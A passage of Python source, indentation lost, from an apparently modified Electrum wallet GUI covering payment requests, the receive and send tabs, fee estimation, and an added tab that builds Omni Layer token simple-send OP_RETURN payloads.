def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_send_omni_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_omni_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.is_max = False
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def create_send_omni_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid1 = QGridLayout()
grid1.setSpacing(8)
grid1.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.amount_e1 = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Receiver'), msg)
grid1.addWidget(payto_label, 1, 0)
grid1.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid1.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid1.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid1.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid1.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid1.addWidget(amount_label, 4, 0)
grid1.addWidget(self.amount_e, 4, 1)
msg = _('Property id of omni layer token.') + '\n\n' \
+ _('The number for desired property to send.') + ' ' \
+ _('Check if Electrum is on mainet or testnet first.')
property_id_label = HelpLabel(_('PropertyId'), msg)
grid1.addWidget(property_id_label, 6, 0)
grid1.addWidget(self.amount_e1, 6, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid1.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
# grid1.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid1.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid1.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid1.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send_omni_tokens)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid1.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.is_max = False
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid1)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_omni_tab', grid1)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.is_max:
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return
if o.value is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def read_send_omni_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
# here is where we put the omnilayer simple send
op_return = '6a14'
omni = '6f6d6e69'
snum_txid = '00000000'
simple_send = '0000'
amount = int(self.amount_e.get_amount() / 1)
hex_amount = str(format(amount, '016x'))
propertyId = int(self.amount_e1.get_amount() / 1)
hex_propId = str(format(propertyId, '04x'))
payload = op_return + omni + snum_txid + simple_send + hex_propId + hex_amount
# text_file = open("Output.txt", "w")
# text_file.write("payload: %s" % payload)
# text_file.close()
outputs.append(TxOutput(TYPE_SCRIPT, payload, 0))
text_file = open("Output.txt", "w")
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return
if o.value is None:
self.show_error(_('Invalid Amount'))
return
text_file.write("address: %s" % o.address)
text_file.write("type: %s" % o.type)
text_file.write("value: %s" % o.value)
text_file.close()
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def _tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return
if o.value is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
